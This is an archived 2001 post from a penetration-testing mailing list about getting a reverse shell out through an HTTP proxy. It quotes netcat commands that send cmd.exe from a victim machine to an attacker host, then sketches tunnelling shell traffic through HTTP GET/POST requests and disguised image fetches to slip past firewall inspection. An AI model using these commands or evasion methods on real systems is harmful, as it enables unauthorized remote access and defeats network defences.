Home page logo

pen-test logo Penetration Testing mailing list archives

RE: Reverse Http Shell Solution
From: Frank Knobbe <FKnobbe () KnobbeITS com>
Date: Thu, 18 Oct 2001 20:55:58 -0500

Hash: SHA1

-----Original Message-----
From: GrandmastrPlague () aol com [mailto:GrandmastrPlague () aol com]
Sent: Thursday, October 18, 2001 2:02 PM

It seems like this question has been asked a million times 
before, but here goes the same old answer again... use netcat 
On attacker machine: 
nc -l -p 80 
On victim machine: 
nc -d -e cmd.exe attacker 80 

Make sure you set up the listening machine first. 

I believe Vinícius meant that there is no way for a straight through
connection as netcat would establish, but instead the requirement to
send GET requests to the proxy which will fetch a page for you.
Netcat won't do that. You would have to have a reverse shell that
operates on a HTTP GET and PUT basis. 

You could modify netcat to do that. Instead of using TCP/UDP
connections, you can replace that mechanism with HTTP GET and PUT
ways of shuffling data, pumping that back to stdin/stdout. The only
catch is to fetch the data correctly as some firewalls will do
content inspection. One way to get around that is to pump data with
POSTs to a form as normal, but receive data via GET's from images in
the web page, or just request for images a'la http://h4x0r/data.gif.


Version: PGP Personal Privacy 6.5.8
Comment: PGP or S/MIME (X.509) encrypted email preferred.


This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]